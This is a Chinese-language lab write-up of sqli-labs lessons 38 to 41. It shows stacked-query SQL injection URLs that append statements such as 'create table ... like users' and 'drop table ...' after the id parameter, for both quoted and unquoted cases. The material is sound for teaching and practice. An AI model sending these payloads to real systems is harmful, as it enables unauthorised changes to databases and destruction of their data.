sqli-labs Less38-Less41

 

补充知识:堆叠注入

 

 

 

 

 

 

 

 

 

Lesson 38  GET - Stacked Query injection - string

 

(1)先测试

  ?id=1

 

  SELECT * FROM users WHERE id=‘1‘ LIMIT 0,1

 

   显示正常,id值被单引号包裹

 

  加上单引号和注释符

  ?id=1‘ --+

 

 

(2)构造语句

  ?id=1‘; create table crow2 like users; --+

 

   执行成功

 

(3)mysql命令行中查看

 

   插入成功

 

(4)删除刚创建的表

  ?id=1‘; drop table crow2; --+

 

   执行成功

 

 

   已成功删除

 

 

  Lesson 38结束

 

 

Lesson 39  GET - Stacked Query injection - Intiger based

 

(1)先测试

  ?id=1

 

  SELECT * FROM users WHERE id=1 LIMIT 0,1

 

   显示正常,id值没有被包裹

 

(2)直接构造语句

  ?id=1; create table crow like users;--+

 

   执行成功

 

 

 

(3)删除刚创建好的表

  ?id=1; drop table crow;--+

 

   执行成功

 

 

   成功删除

 

 

  Lesson 39结束

 

 

Lesson 40  GET - Blind based - string - stacked

(1)先测试

  ?id=1 

  SELECT * FROM users WHERE id=(‘1‘) LIMIT 0,1

 

   显示正常,id值被单引号和括号包裹

 

  加上单引号和单括号 注释符

  ?id=1‘) --+

 

 

(2)构造语句

  ?id=1‘); create table crow lie users; --+

 

 

 

   创建成功

 

(3)删除表

  ?id=1‘); drop table crow; --+

 

   执行成功

 

 

   删除成功

 

 

  Lesson 40结束

 

 

 

Lesson 41  GET - Blind based - Intiger - Stacked

 

(1)先测试

  ?id=1

 

  SELECT * FROM users WHERE id=1 LIMIT 0,1

 

   显示正常,id值没有进行包裹

 

(2)加上单引号

  ?id=1‘

 

   没有任何回显

 

  前几关,加上相应的会进行报错,所以证明这次的是盲注,只有输入正确的时候才会显示。不过不怎么影响接下来的操作。

 

(3)构造语句

  ?id=1; create table crow like users;--+

 

 

 

   创建成功

 

(4)删除表

  ?id=1; drop table crow;--+

 

 

 

   删除成功

 

 

 

  Lesson 41结束

 

相关文章